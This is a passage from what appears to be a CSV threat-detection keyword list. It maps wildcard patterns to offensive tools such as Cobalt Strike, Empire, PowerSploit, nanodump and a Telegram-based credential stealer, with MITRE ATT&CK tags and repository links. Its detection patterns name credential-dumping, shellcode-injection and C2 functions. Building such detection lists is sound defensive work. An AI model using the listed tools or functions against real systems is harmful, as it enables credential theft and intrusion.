cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*word_unc_injector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Wordlist/ftp_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ftp_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ftp_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/mssql_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/mysql_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/oracle_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/pass.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/pop_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/pop_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/postgres_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/smtp_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/smtp_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/snmp.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/sql_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/sql_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ssh_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ssh_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ssh_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/telnet_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/telnet_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/telnet_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/user.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/vnc_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/windows_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/windows_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*wordlist_TLAs.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*--wordlist=*-passwords.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*wordlist-nthash-reversed*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" +"*wordlist-probable.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wordlists*rmg.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*wordlists*rmiscout.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*wordlists/dynamic-all.txt*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*wordlists/fasttrack.txt*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*wordlists/rockyou.txt'*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*wordlists/subdomains-5000.txt*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*wordlists/top1million.txt*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*WorldWind Stealer.zip*","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","10","1","11","3","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z" +"*WorldWind-Stealer*","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","10","1","11","3","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z" +"*wpapcap2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*wp-exploitable-plugins.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*wpscan --api-token *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*WPScan*","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","N/A","Web Attacks","https://github.com/wpscanteam/wpscan","1","1","N/A","N/A","10","7831","1230","2023-10-02T10:48:40Z","2012-07-11T20:27:47Z" +"*wrap_execute_assembly*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*wrap_execute_encoded_powershell*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*wrap_get_clipboard*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*wrap_inject_shellc*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*wrap_load_memfd*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*wrap_unhook_ntdll*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*write_cs_teamserver*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*write_payload_dll_transacted*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*write_what_where.py*","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","242","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" +"*WriteAndExecuteShellcode*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*WriteDLLPermission.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Write-HijackDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Write-HijackDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Write-HijackDll*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Write-Output 127.0.0.1:1111*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*WritePayloadDllTransacted*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*Write-PortscanOut*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Write-ServiceBinary*","offensive_tool_keyword","AD exploitation cheat sheet","Exploit an unquoted service path vulnerability to spawn a beacon","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Write-UserAddMSI*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*ws://localhost:58082*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*wscript_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 